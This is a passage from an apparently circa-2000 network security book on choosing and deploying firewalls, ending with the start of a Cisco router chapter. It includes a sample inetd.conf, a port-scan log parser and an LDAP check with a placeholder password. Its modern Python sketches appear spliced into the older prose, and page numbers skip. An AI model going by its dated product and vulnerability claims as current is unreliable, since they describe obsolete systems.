\nFinally, a firewall running on the new OS X will see benefits of performance (from a cutting-edge UNIX-based \noperating system), configuration (each specific service can be turned on or off at will), and support tools (most \nUNIX-based security support utilities will run on OS X). \nMacintosh Weaknesses There are some significant weaknesses that are actually the flip side of the Macintosh’s \nstrengths. Because the system is not well known, the possibility exists that many vulnerabilities are waiting to be \ndiscovered by any hacker who might make a serious attempt to penetrate it. \nAlso, because a Macintosh server has only a limited number of configuration and application choices, \nadministrators may feel that they miss extras—like the ability to highly customize the components on their server. \nAnd although there are firewall products for the Macintosh, most of these are designed to be personal firewalls, \nnot to function as servers to protect an entire network. This, coupled with the lack of many supportive tools for \nfirewalls (such as Macintosh-based analysis and response tools), significantly limits the flexibility of a Macintosh-\nbased firewall. \nThere is also the issue of performance. Although in recent years Apple hardware has seen very impressive \nperformance, the operating system has not followed suit. As a result, a very busy Macintosh server acting as a \nfirewall and router can potentially become overwhelmed. \nFurthermore, OS X will introduce some new weaknesses. Because of its UNIX heritage, the greatest initial \nsecurity risks on OS X come from the daemons (services) that are installed by default—something that we’ll cover \nmore in depth in talking about UNIX (below). \nUNIX \nUNIX has been around far longer than other operating systems, including Microsoft Windows NT (and NT-based \noperating systems like Windows 2000), and the first firewalls were designed on Unix systems. This means that the \nidiosyncrasies of the platform are well understood and documented, and the firewall products that run on it are \nstable. Although most versions of Unix are sold commercially (such as Sun’s Solaris, HP’s HP-UX, and IBM’s \nAIX), it is still considered a fairly open system because so much is known about its fundamental structure and \nservices. When security weaknesses are discovered with Unix, they tend not to be with the core operating system, \nbut with services and applications running on top of it. \nUnix also has the benefit of outperforming other operating systems. This, combined with the many hardware \nplatforms and configurations that support Unix, makes it a preferred operating system for intensive and large data \noperations. Good firewall practice dictates that all applications and components not essential to the operation of \nthe firewall are disabled, and this is particularly easy to accomplish in UNIX. \n" }, { "page_number": 105, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 105\nUNIX Strengths Specific strengths of UNIX are many. It is highly configurable, well understood by many in the \nsecurity industry, and is the most prominent operating system in existence. Many resources are dedicated to \nunderstanding and fixing any security issues that might arise. \nUNIX is also considered to be a very stable high-performing operating system. 
In addition, because of its ability to run on multiple hardware platforms (such as the DEC Alpha and the IBM RS/6000), and on multiple-processor versions of these platforms, it can support the high data rates required of any firewall supporting a large network. It is also relatively immune from the need to reboot the machine after configuration changes, something that has afflicted Windows NT-based systems.
There are more security and security support products for UNIX than for any other platform (although Windows NT is a close second). This, coupled with its 30-year history, has made UNIX the preferred choice for many large organizations.
UNIX Weaknesses So what are the negatives? Problems arise when inexperienced Unix administrators place firewalls on "out of the box" installations and don't disable the many vulnerable (but potentially valuable on a non-firewall system) programs and services (daemons) that are enabled by default. And because many of these daemons are configured to run in the security context of root (the all-powerful superuser account), they provide an attacker with complete access to the system once they have exploited vulnerable system components.
Deactivating daemons is relatively simple. Administrators simply remove or rename the scripts that activate the respective daemon at boot time, or comment out the line in the inetd.conf configuration file, if the daemon is called by inetd. (See the following view of an inetd.conf configuration file.)
# These are standard services.
#
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn
#smtp stream tcp nowait root /usr/bin/smtpd smtpd
#nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd
#
# Shell, login, exec and talk are BSD protocols.
#
shell stream tcp nowait root /usr/sbin/tcpd in.rshd
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
talk dgram udp wait root /usr/sbin/tcpd in.talkd
ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp wait nobody /usr/sbin/tcpd in.dtalkd
#
# Pop and imap mail services et al
#
pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
imap stream tcp nowait root /usr/sbin/tcpd imapd
#
# Tftp service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers." Do not uncomment
# this unless you *need* it.
#
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
# cfinger is for GNU finger, which is currently not in use in RHS Linux
#
finger stream tcp nowait root /usr/sbin/tcpd in.fingerd
#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#
# Time service is used for clock synchronization.
#
time stream tcp nowait nobody /usr/sbin/tcpd in.timed
time dgram udp wait nobody /usr/sbin/tcpd in.timed
#
# Authentication
#
auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
#
# End of inetd.conf
More weaknesses are exploited in Unix on a weekly basis than on any other operating system. As an example, CERT (the Computer Emergency Response Team at Carnegie Mellon) reported on September 15, 2000 that hackers were using two common vulnerabilities to conduct widespread attacks. The first vulnerability is with the rpc.statd daemon that is used to support NFS (Network File System). The second is with wu-ftpd, an ftp server package provided by Washington University. Because these services are installed and activated on most UNIX (and Linux) systems by default, administrators who install firewalls on default installations are leaving their entire network vulnerable.
Unix is considered to be a more difficult system to learn and administer, and the cost of a Unix system has traditionally been higher than that of other operating systems. And because there are so many documented weaknesses with Unix, an administrator has to invest more time in securing the system; otherwise an attacker with access to the same information on Unix vulnerabilities can take advantage of "so many holes."
OpenBSD: An exception to the UNIX rule One UNIX variation that minimizes the risk of pre-installed vulnerable daemons is OpenBSD. OpenBSD installs with no services accessible by default; the administrator is forced to manually choose which services and components will run.
Created and maintained by volunteers and distributed for free, OpenBSD is sometimes confused with Linux. In fact, it is a very tightly controlled collaborative UNIX project with specific goals. While weaknesses can still be found, the response time to correct those weaknesses is considered the best in the industry. That, coupled with a proactive attitude toward locating and correcting software errors, makes OpenBSD a compelling choice for many firewall administrators.
Linux
What about Linux, the most significant challenger in the operating system wars in recent memory? Linux shares many of the strengths and weaknesses of UNIX.
Linux Strengths Like Unix, the Linux platform is highly configurable, stable, well understood, and has many available security-related products. The greatest attraction to Linux, however, is its open nature. In fact, Linux is more open than OpenBSD, and many in the security industry favor this principle of exposing source code to as many eyes as possible in the search for errors and vulnerabilities. And the communal nature of the Linux community means a ready and willing support group for security specialists with concerns and questions.
Linux Weaknesses The factors that weigh against Linux are that it's difficult to learn and has many known vulnerabilities.
Microsoft Windows NT
In contrast to Linux, Microsoft brings the power of familiarity. As Cervantes observed in Don Quixote, however, familiarity breeds contempt, and that's true of Microsoft Windows NT and Windows 2000.
NT Strengths Since Windows NT is an extension of the Windows Desktop environment (by far the most popular operating system ever produced), NT is a far more familiar environment to the typical end user.
This means that the user is not forced to learn a completely new environment just to run firewall software. Even more important, a company is not required to hire additional resources just to manage its firewall.
In fact, NT-based systems have traditionally been less expensive than their UNIX counterparts, and the fact that the investment in hardware and software (let alone expertise) is usually less for an NT-based system must be taken into account.
It is argued that familiarity augments security. Since people are familiar with NT, they are less likely to configure the platform incorrectly and cause a security problem. While it may or may not be true that UNIX can be configured to be a more secure environment, certainly a secure environment can never be achieved if a user does not understand how to properly manage it.
Finally, the argument can be made for consistency. Since many organizations run NT for file, print, and application services, it makes sense to standardize on this one platform for all required services. This makes administration easier and more harmonious. It also helps to reduce or abolish compatibility problems.
NT Weaknesses The greatest weakness attributed to NT is one of perception—that Microsoft is slow and reluctant to admit and correct security weaknesses. There has been an incident where a third party discovered a weakness, privately notified Microsoft, and then went public after waiting more than a month for Microsoft to announce a patch; there is no evidence, however, that this is a pattern. And while significant vulnerabilities have been discovered, they have, for the most part, been limited to services that are not pre-installed on NT and would not be placed on a firewall system (like IIS—Microsoft's Web server).
Because of the proprietary nature of NT, not much is known about the internal workings of the services, and they are not configurable to the same degree as UNIX daemons. This might also create some uncertainty for security specialists who are looking for the most secure platform with which to run their firewall.
Other negatives include the need to reboot NT servers after configuration changes (or even after several days or weeks of operation due to system instability), and purchase and licensing fees associated with an NT server.
Windows 2000
How does Windows 2000 compare to Windows NT? Windows 2000 shares many common weaknesses with Windows NT, including its proprietary nature, the perceived reluctance on the part of Microsoft to admit (and remedy) vulnerabilities, and the significant costs associated with using a Windows product. Like NT, Windows 2000 also has the strength of user familiarity and consistency throughout the network.
Windows 2000 does have some unique strengths that distinguish it from NT. First is the ability to make configuration changes without needing to restart the server. Second is the increased stability of the server, which lengthens its uptime (and therefore, increases reliability).
Many experts believe that it is too early to determine how secure W2K is compared to NT, and that more time is necessary to expose potential errors and vulnerabilities. Some weaknesses unique to W2K have already been discovered and patched—such as the vulnerability in the Telnet Service that would allow a hacker to take full control of an administrative telnet session, leaving the entire server (and potentially the entire network) exposed and at risk.
Appliance-Based Firewalls
Also called integrated solutions, appliance-based firewalls run on proprietary hardware and software, and usually consist of a physically small box with network connections and a power source. Appliance-based firewalls include
ƒ Cisco PIX
ƒ Check Point VPN-1
ƒ eSoft Interceptor
ƒ Progressive Systems Phoenix Adaptive Firewall
ƒ SonicWALL PRO
ƒ WatchGuard LiveSecurity System 4.1
Integrated firewalls provide an all-in-one solution, with the vendor supplying the hardware, software, and operating system. Integrated solutions are quite popular, especially for small businesses that do not have a full-time IT staff and require basic firewall functionality without the need for advanced customization. Larger businesses also rely on more expensive, higher-end integrated firewalls to handle the extreme traffic flow generated by having many computers that require protected access to the Internet, or e-commerce sites that have millions of visitors a day.
Appliance Strengths
The greatest benefit of integrated solutions is their short configuration time. Many firewalls are pre-configured to protect your network literally out of the box. Simply by connecting the Internet into one port, and your internal network into another, the device begins to immediately filter network traffic. Small businesses benefit from this simplicity, especially when they do not have a full-time or experienced IT staff. If configuration is required, administration can be done from a simple Web browser or from the installation of a proprietary administrative utility.
Performance is the other benefit most often cited by large corporations who purchase integrated firewalls. Because these firewalls use programmable hardware (also called firmware), they can operate at much higher speeds than those firewalls that have an extra layer of operating system and hardware (both of which are designed to do general computing tasks, and have not been optimized for firewall tasks).
This focus on dedicated design also has the potential of reducing firewall costs, since there is no requirement to purchase an operating system and licenses in addition to the firewall application; everything is included in a tightly integrated package by the vendor. This monolithic approach (where everything is controlled, designed, and supported by the vendor) can actually increase security by minimizing the number of hands in the pie. And simplicity (having one vendor produce everything) is considered the Holy Grail of any security system.
Appliance Weaknesses
On the other hand, such a monolithic approach to a firewall might limit the flexibility of a product or the ability to upgrade the underlying hardware (such as installing more RAM as desired in a server-based firewall). Appliances also limit an organization to one vendor for their entire security system, as opposed to using a modular system that could encourage "best of breed" for all components—the best operating system tied to the best firewall which feeds into the best analysis system, with all three coming from different vendors.
Appliances have also been known to be more expensive than simple software solutions, and depending on the level of complexity needed by your organization, you might be better served by going with a traditional software firewall.
Additional Firewall Considerations
No matter what type of firewall you choose, there are some potential features that you should analyze closely before selecting a specific firewall product. These features are common to all types of firewalls, so we will review them here in a two-part summary.
ƒ Firewall Functionality
o Address translation
o Firewall logging and analysis
o VPNs
ƒ Management
o Intrusion Detection and Response
o Integration and deployment
o Authentication/Access Control/LDAP
o Third-party tools
We will examine each of these features and the issues you need to consider when choosing a firewall product.
Address Translation
Address translation is considered a basic firewall function. Don't trust a firewall product that doesn't include this option. When an IP address is converted from one value to another, it is called address translation. This feature has been implemented in most firewall products and is typically used when you do not wish to let remote systems know the true IP address of your internal systems. Figure 5.12 shows the typical deployment of this configuration.
Figure 5.12: Address translation
Our internal workstation wishes to access an external Web site. It formulates a request and delivers the information to its default gateway, which in this case is the firewall. The desktop system has one minor problem, though: the subnet on which it is located is using private addressing.
Private addressing is the use of reserved IP subnet ranges that any organization may assign to its internal hosts. This is allowable because these ranges are not permitted to be routed on the Internet. While this means we can use these addresses without fear of conflict, it also means that a remote system receiving one of our requests will have no route it can use to reply. These ranges are
ƒ 10.0.0.0–10.255.255.255
ƒ 172.16.0.0–172.31.255.255
ƒ 192.168.0.0–192.168.255.255
It's All in the Port Numbers
How does the firewall distinguish between replies that are coming back to this workstation and traffic that is destined for other systems or for the firewall itself? If the firewall is translating the address of all desktop machines to match the address of its own interface, how does it tell the difference between different sessions?
Look closely at the two packet headers in Figure 5.12 and you will see that one other value has been changed. Along with the source IP address, the firewall has also changed the source port number. This port number is used to identify which replies go to which system.
Remember that the source port is typically a value dynamically assigned by the transmitting system. This means that any value above 1023 is considered acceptable. There should be no problems with having the firewall change this value for accounting purposes. In the same way that the source port number can be used between systems to distinguish between multiple communication sessions, the firewall can use this source port number to keep track of which replies need to be returned to each of our internal systems.
Our firewall will modify the IP header information on the way out and transmit the packet to its final destination. On the way back, our firewall will again need to modify the IP header in order to forward the data to the internal system.
In the reply packet, it will be the destination IP address and service port that will need to be changed. This \nis because the remote server will have replied to the IP address and source port specified by the firewall. The \nfirewall needs to replace these values with the ones used by the desktop workstation before passing along the \ninformation. \n" }, { "page_number": 110, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 110\n \nSo while our workstation could reach the remote server, the remote server would not be able to reply. This is \nwhere address translation is useful: we can map the IP address of the workstation to some other legal IP address. \nIn the case of Figure 5.12, we have translated the desktop’s IP address of 192.168.1.50 to the same legal address \nused by the external interface of the firewall, which is 199.53.72.2. \nThere are three ways of deploying address translation: \nƒ \nHiding Network Address Translation (hiding NAT) \nƒ \nStatic Network Address Translation (static NAT) \nƒ \nPort Address Translation (PAT) \nThe benefits and limitations of each are reviewed in the following sections. \nHiding NAT \nHiding NAT functions exactly as described in Figure 5.12. All internal IP hosts are hidden behind a single IP \naddress. This can be the IP address of the firewall itself or some other legal number. While hiding NAT can \ntheoretically support thousands of concurrent sessions, multiple hiding addresses can be used if you require \nadditional support. \nThe biggest limitation of hiding NAT is that it does not allow the creation of any inbound sessions. Since all \nsystems are hidden behind a single address, the firewall has no way of determining which internal system the \nremote session request is destined for. Since there is no mapping to an internal host, all inbound session requests \nare dropped. \nThis limitation can actually be considered a feature, as it can help augment your security policy. If your policy \nstates that internal users are not allowed to run their own servers from their internal desktop machines (Web, FTP, \nand so on), using hiding NAT for all desktop machines is a quick way to insure that these services cannot be \ndirectly accessed from outside the firewall. \nStatic NAT \nStatic NAT functions similarly to hiding NAT, except that only a single private IP address is mapped to each \npublic IP address used. This is useful if you have an internal system using private IP addresses, but you wish to \nmake this system accessible from the Internet. Since only one internal host is associated with each legal IP \naddress, the firewall has no problem determining where to forward traffic. \nFor example, let’s assume that you have an internal Exchange server and you wish to enable SMTP functionality \nso that you can exchange mail over the Internet. The Exchange server has an IP address of 172.25.23.13, which is \nconsidered private address space. For this reason, the host cannot communicate with hosts located on the Internet. \nYou now have two choices: \nƒ \nYou can change the address from a private number to a legal number for the entire \nsubnet on which the Exchange server is located. \nƒ \nYou can perform static NAT at the firewall. \nClearly, the second option is far easier to deploy. It would allow internal systems to continue communicating with \nthe Exchange server using its assigned private address, while translating all Internet-based communications to a \nvirtual legal IP address. 
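The translation logic for both approaches can be sketched in a few lines of Python. This is illustration only: the addresses mirror the examples in the text, the 199.53.72.3 static mapping for the Exchange server is invented for the sketch, and the port allocator is deliberately simplistic.

# A minimal sketch of hiding NAT vs. static NAT translation logic.
# Real NAT lives in the kernel/firmware and also fixes checksums,
# handles timeouts, and avoids port collisions.
FIREWALL_IP = "199.53.72.2"
STATIC_MAP = {"172.25.23.13": "199.53.72.3"}   # Exchange server, 1:1 (hypothetical)

hide_table = {}        # translated source port -> (internal ip, internal port)
next_port = 1024       # simplified allocator for translated source ports

def translate_outbound(src_ip, src_port):
    """Rewrite the source of an outbound packet."""
    global next_port
    if src_ip in STATIC_MAP:                    # static NAT: 1:1, port unchanged
        return STATIC_MAP[src_ip], src_port
    next_port += 1                              # hiding NAT: share one address,
    hide_table[next_port] = (src_ip, src_port)  # distinguish sessions by port
    return FIREWALL_IP, next_port

def translate_inbound(dst_ip, dst_port):
    """Map a reply back to the internal host, or drop it."""
    for internal, external in STATIC_MAP.items():
        if dst_ip == external:
            return internal, dst_port           # static NAT works both ways
    if dst_ip == FIREWALL_IP and dst_port in hide_table:
        return hide_table[dst_port]
    return None                                 # unsolicited inbound: dropped

print(translate_outbound("192.168.1.50", 1024))   # ('199.53.72.2', 1025)
print(translate_inbound("199.53.72.2", 1025))     # ('192.168.1.50', 1024)
print(translate_inbound("199.53.72.2", 9999))     # None: no inbound mapping

Notice how translate_inbound returns None for traffic that matches no recorded session; that is precisely why hiding NAT cannot support inbound connections, as discussed above, while the static mapping works in both directions.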
\nStatic NAT is also useful for services that will break if hiding NAT is used. For example, some communications \nbetween DNS servers require that the source and destination port both be set to port 53. If you use hiding NAT, \nthe firewall would be required to change the source port to some random upper port number, thus breaking the \ncommunication session. By using static NAT, the port number does not need to be changed, and the \ncommunication sessions can be carried out normally. \nTip \nMost NAT devices will allow you to use both static and hiding NAT simultaneously. This \nallows you to use static NAT on the systems that need it, while hiding the rest. \n" }, { "page_number": 111, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 111\nPort Address Translation (PAT) \nPort address translation is utilized by most proxy firewall products. When PAT is used, all outbound traffic is \ntranslated to the external IP address used by the firewall, in a way similar to hiding NAT. Unlike hiding NAT, the \nexternal address of the firewall must be used. This cannot be set to some other legal value. \nThe method for dealing with inbound traffic varies from product to product. In some implementations, ports are \nmapped to specific systems. For example, all SMTP traffic directed at the firewall’s external interface (which has \na destination port number of 25) is automatically forwarded to a specific internal system. For a small environment, \nthis limitation is rarely a problem. For large environments that operate multiple systems running the same type of \nserver (such as multiple mail or FTP servers), this deficiency can be a major obstacle. \nIn order to get around this problem, some proxy servers can analyze data content in order to support multiple \ninternal services. For example, a proxy may be able to forward all inbound SMTP mail addressed as \nuser@eng.bofh.org to one internal mail system and mail addressed to user@hr.bofh.org to another. \nIf you have multiple internal servers running the same service, make sure your firewall can distinguish between \nthem. I’ve seen more than one organization that has been bitten by this limitation and has been forced to place \nservers outside the firewall. This is like walking to work in a blizzard because the shiny new Corvette you just \npurchased got stuck in a half-inch of snow. \nFirewall Logging and Analysis \nWhile a firewall’s primary function is to control traffic across a network perimeter, a close second is its ability to \ndocument and analyze all the traffic it encounters. Logging is important because it documents who has been \ncrossing your network perimeter—and who has attempted to cross, but failed. Analysis is important because it \nmight not be readily apparent from a casual view of the log which incidents are attempts to actually cross your \nperimeter, and which are investigations for openings in the “fence” in preparation for a future attack. \nWhat defines a good firewall log? Obviously, this comes down to personal preference. There are, however, a \nnumber of features you should consider: \nƒ \nThe log should present all entries in a clear, easy-to-read format. \nƒ \nYou should be able to view all entries in a single log so that you can better identify traffic \npatterns, although the ability to export the log data to an analysis tool would be of even \ngreater value. \nƒ \nThe log should clearly identify which traffic was blocked and which traffic was allowed to \npass. 
\nƒ \nIdeally, you should be able to manipulate the log, using filtering and sorting, to focus on \nspecific types of traffic, although this feature is best suited to an analysis tool. \nƒ \nThe log should not overwrite itself or drop entries based upon a specific size limitation. \nƒ \nYou should be able to securely view logs from a remote location. \nƒ \nThe logging software should have some method of exporting the log to at least one common \nformat, such as ASCII text (preferably with some kind of delimiter). This allows the data to \nbe manipulated further within a reporting tool, spreadsheet, or database program. \nKind of a tall order, but all are important features. It is very rare that an attacker will gain access on the very first \ntry. If you schedule time to scrutinize the logs on a regular basis, you may be able to thwart an attack before it \neven happens. A good logging tool will help. \nFor example, look at the log viewer shown in Figure 5.13. This is FireWall-1’s log viewer, and it does a very good \njob of fulfilling the criteria we have listed. The log is easy to read, easy to follow, and can even be reviewed \nremotely from an alternate workstation through a secure session. The Select menu option even lets you select \ndifferent filtering and sort options. \n" }, { "page_number": 112, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 112\n \nFigure 5.13: Firewall-1’s log viewer \nLook closely at the services reported in each of the packet entries in Figure 5.13. See anything strange? Our source \nsystem Herne appears to be attempting to connect to Skylar on every TCP service port sequentially. Our display \nstarts at service port 20 (FTP-data) and continues one port at a time to port 35. This is an indication that Herne is \nrunning a port scanner against Skylar in order to see what services are offered. \nIn contrast to this would be a log viewer such as the one used with Secure Computing’s BorderWare firewall. This \nfirewall maintains no less than six separate logs. While this makes tracking a particular service a bit easier, it \nmakes tracking a specific host far more difficult. You would need to use a third-party program in order to combine \nthe information and get a clear look at what is going on. Also, while the log in Figure 5.13 can be exported and \nsaved using a simple menu option, BorderWare requires you to enable FTP administration and manually transfer \nthe file to your local machine. \nTip \nKeep the flexibility of the log interface in mind when you are selecting a firewall product. \nWhile the firewall’s ACL will typically be set and require very few changes, you should \nplan on spending quite a bit of time reviewing your firewall logs and analyzing traffic flow. \nVirtual Private Networks (VPNs) \nVirtual private networks (VPNs) are considered a feature that sets a high-end firewall apart from the rest of the \ncrowd. VPNs allow authenticated and encrypted access to an intranet through the public Internet. This means that \ninstead of expensive point-to-point communication, LANs or mobile users can use inexpensive ISPs to \ncommunicate with their internal organization’s resources. \nHowever, simply providing basic VPN service is not enough. You’ll need to determine what configuration, \nmanagement, and encryption options your firewall provides for VPNs. In some cases a dedicated VPN solution \nthat integrates into your firewall might provide the best results. 
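As a quick illustration of why delimited log export matters, the following Python sketch flags the kind of sequential port scan shown in Figure 5.13. The semicolon-delimited log format (time;source;destination;port;action) and the five-port threshold are both invented for the example; adapt them to whatever format your firewall actually exports.

# A small sketch of log analysis: flag sequential port scans in an
# exported, delimited firewall log. Format and threshold are invented.
from collections import defaultdict

log = """10:31:01;herne;skylar;20;drop
10:31:01;herne;skylar;21;drop
10:31:02;herne;skylar;22;drop
10:31:02;herne;skylar;23;drop
10:31:03;herne;skylar;24;drop"""

ports = defaultdict(set)                     # (source, dest) -> ports touched
for line in log.splitlines():
    _, src, dst, port, _ = line.split(";")
    ports[(src, dst)].add(int(port))

for (src, dst), touched in ports.items():
    hit = sorted(touched)
    # Many sequential ports from one source is a classic scan signature.
    if len(hit) >= 5 and hit[-1] - hit[0] == len(hit) - 1:
        print("possible port scan: %s -> %s, ports %d-%d"
              % (src, dst, hit[0], hit[-1]))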
Intrusion Detection and Response
The ability of a firewall to notify an administrator while an attack is taking place should also enter the purchase and deployment decision. In the case of the high-profile DoS (Denial of Service) attacks that took place in February of 2000, the ability of the firewall systems to instantly notify the IT staff of unusual network activity allowed several of the sites to return to functionality within the hour.
Future firewall systems promise a degree of cooperation that would allow entire networks to respond to and reconfigure themselves in the event of an attack. While experts feel that the technology for this level of proactive monitoring and response is feasible, challenges remain. To be truly effective, such a system would require the cooperation and communication of all affected parties, even if this involved distinct (or even competitive) businesses and organizations. Assuming such a level of communication and integration existed, the anonymity of an attacker would become much more difficult to maintain, and the effects of an attack would be neutralized much more quickly.
There are already formal and informal groups that monitor and report intrusions, as well as viruses, worms, and Trojan horse infections (such as the "I Love You" worm in May of 2000). However, the reporting mechanisms are, more often than not, manual, requiring an "eyes on" approach. Ideally, reporting would be automatic, standardized, and provide intelligent systems with enough information to allow for automatic or proactive defensive actions.
Integration and Access Control
Firewalls are integrating more and more with other network systems and services. This trend promises to simplify administration, reduce complexity, and reduce TCO (Total Cost of Ownership), as firewalls no longer have to duplicate pre-existing network infrastructure.
Examples of integration include directory and authentication services that eliminate redundant user account information and allow customizable authentication schemes. Two industry standards that provide these services are LDAP (Lightweight Directory Access Protocol) and RADIUS (Remote Authentication Dial In User Service).
Lightweight Directory Access Protocol (LDAP)
LDAP creates a tunnel between two directory services, or between a directory service and a client. For firewalls, this means that instead of creating user and group/role accounts redundantly, the system can use accounts and properties stored in a third-party directory service to determine access. This has a direct benefit of reducing the administrative burden of creating and managing duplicate user and group/role accounts, and it also reduces complexity—the greatest enemy to any security system. Examples of directory services include Microsoft's AD (Active Directory), Novell's NDS (NetWare Directory Services), and iPlanet's Directory Server.
Remote Authentication Dial In User Service (RADIUS)
RADIUS offers an extensible and independent platform for authentication. Not only does this allow for customized authentication schemes (such as smart cards or biometric devices), RADIUS servers offload the actual authentication workload from the firewall (or LDAP-compliant directory services). By providing an infrastructure dedicated only to authentication, RADIUS simplifies and strengthens the authentication (and as a result, access) process.
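As a sketch of what the LDAP integration described above might look like, the following Python fragment uses the third-party ldap3 library to ask a directory server whether a user belongs to a group before an outbound session is authorized. The server address, DNs, group name, and service-account credentials are all placeholders invented for the example, not any particular firewall's API.

# A sketch of directory-based access control: permit a user's session
# only if the directory says the user is in the "InternetUsers" group.
# All names below are hypothetical.
from ldap3 import Server, Connection

def user_may_browse(username):
    server = Server("ldap://directory.bofh.org")
    conn = Connection(server, user="cn=firewall,ou=services,o=bofh",
                      password="secret")       # placeholder service account
    if not conn.bind():
        return False                           # fail closed if the directory is down
    conn.search(search_base="ou=groups,o=bofh",
                search_filter="(&(cn=InternetUsers)(member=cn=%s,ou=people,o=bofh))"
                              % username,
                attributes=["cn"])
    allowed = len(conn.entries) > 0
    conn.unbind()
    return allowed

# e.g. permit the outbound session only if user_may_browse("cwheeler") is True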
Third-Party Tools
Many modern networks are a Frankenstein of multiple technologies from many different vendors; while this may be an optimal collection of technology for your organization, it can be a nightmare to administer. Fortunately, new technologies are emerging that are designed to centrally monitor and manage all of your network devices and applications. An excellent example is HP's OpenView, which provides management in the following areas:
ƒ Applications
ƒ Availability
ƒ Networks
ƒ Performance
ƒ Services
ƒ Systems
ƒ Storage and Data
The ability for your firewall to work with third-party management tools could easily be a decisive factor in which product you choose.
But management is not the only area for which you can find third-party products. Check Point's VPN-1 allows other vendors to extend its features to include URL filtering, antivirus scanning, and e-mail spam protection. These additional benefits might justify the (usually) increased cost of such a product.
You Decide
There are some strong arguments for each choice. In order to make the proper selection for your environment, you will need to review all of these arguments and decide which are more applicable to your particular environment. Table 5.6 breaks down popular firewall products by price, feature, and platform.
Table 5.6: Popular firewall products compared by price, feature, and platform
Name | Services (Static/…) | Operating System | Address translation | Firewall logging | VPNs | Intrusion Detection | Integration and access | Other services
Check Point VPN-1 | All | Appliance | Yes | Monitoring acti… | Yes (including… | Can be centrally… | DES and 3DES… | URL filtering, anti…
Cisco Secure PIX | All | Appliance | Yes | Add-on (Cisco… | IPSec, PPTP | Cisco Secure… | RADIUS, TACA… | Antivirus, URL…
eSoft Interceptor | All | BSD Unix | Yes | No native sup… | IPSec (optional… | Pager, e-mail | CryptoCard, RA… | Learning Compa…
Progressive Systems Phoenix Adaptive Firewall | All | Appliance | Yes | Export of data… | Proprietary (IPS… | Reactive anti… | Entrust, RADIUS | None
SonicWALL PRO | All | Appliance | Yes | Limited, no anal… | IPSec, PPTP | Email | 56-bit DES, 3DE… | AutoUpdate, coo…
WatchGuard LiveSecurity System 4.1 | All | Appliance (Lin… | Yes | Real time logg… | PPTP | Email, pager | CryptoCard, Inte… | NetMeeting (hardwa…
Firewall Deployment
You have selected a firewall product—now the big question is how it should be placed within your network environment. While there are many different opinions on this topic, the most common deployment is shown in Figure 5.14.
Figure 5.14: Where to place your firewall
In this design, all internal systems are protected by the firewall from Internet-based attacks. Even remote sites connected to the organization via the WAN link are protected.
All systems that are accessible from the Internet (such as the Web server and the mail relay) are isolated on their own subnet. This subnet is referred to as a DMZ or demilitarized zone, because while it may be secure from attack, you cannot be 100 percent sure of its safety, as you are allowing inbound connections to these systems.
Using a DMZ provides additional protection from attack. Since some inbound services are open to these hosts, an attacker may be able to gain high-level access to these systems. If this occurs, it is less likely that additional internal systems will be compromised, since these machines are isolated from the rest of the network.
Chapter 6: Configuring Cisco Router Security Features

In the previous chapter, we discussed firewall theory and how these devices go about filtering traffic. In this chapter, we will look at how to configure a Cisco router in order to secure network perimeters. Cisco has become a staple in providing Internet connectivity, so most likely you are using a Cisco router to connect to your Internet Service Provider.
Since a router is required equipment for a dedicated WAN connection, knowing how to configure Cisco security features can also be useful for controlling traffic between business partners.

Cisco Routers

Cisco is arguably the number-one supplier of hardware routers. It has a diverse product line, which means it has a router to suit almost every configuration requirement. Whether you are using an analog dial-up, ISDN, leased line, Frame Relay, T1, or even a T3 circuit to connect to your ISP, Cisco has a number of products that can fit your needs.

A unique ability of the Cisco router series is that, as of IOS 11.3, reflexive filtering is supported. Reflexive filtering allows a Cisco router to maintain connection session state. This means that while most routers only support static filtering, a Cisco router using IOS 11.3 or higher is capable of performing dynamic packet filtering. This is extremely beneficial for the small shop that does not require a full-featured firewall, or for use on perimeters where a full-featured firewall is not cost effective (such as a WAN link to a business partner or a so-called "Chinese firewall"). This feature set can even be combined with an additional firewall solution to strengthen a perimeter even further. Cisco routers running the newer IOS 12.1 can also filter based on connection time and context, further extending their usefulness as security devices.

When selecting a router for Internet connectivity, most organizations have traditionally gone with a Cisco 2500 series router. However, because the 2500 series routers are not very expandable, companies with newer implementations have started to purchase the 2600 series, which is modular, expandable, and has interfaces compatible with other Cisco router families. In addition, businesses have begun to incorporate newer technologies into their networks, such as Fast Ethernet (100Mbps), Gigabit Ethernet (1000Mbps), VLANs (Virtual LANs), VPNs, digital telephony, and streaming multimedia. This demand has dramatically increased the variety of router offerings, even from a single vendor.

A summary of the more popular models of the 2500 and 2600 series product lines is shown in Table 6.1. Remember that earlier Cisco models typically used an Attachment Unit Interface (AUI) connection for Ethernet segments, so you may need to purchase a transceiver as well.

Note: A transceiver will convert between the DB15-pin connection used by an AUI port and the female RJ45 connection used in a twisted-pair environment.

Table 6.1: Popular Models of the Cisco 2500 and 2600 Series

Cisco Model Number | Included Ports | Speed
2503 | 1 Ethernet, 1 BRI, 2 serial | 128K ISDN, 10Mbps
2520 | 1 Ethernet (AUI), 1 Ethernet (RJ45), 1 BRI, 1 serial | 128K ISDN, 10Mbps
2610 | 1 Ethernet (RJ45), 1 Network Module slot, 2 WAN Interface Card slots, 1 Advanced Integration Module (AIM) slot | Port specific (maximum = 100Mbps)
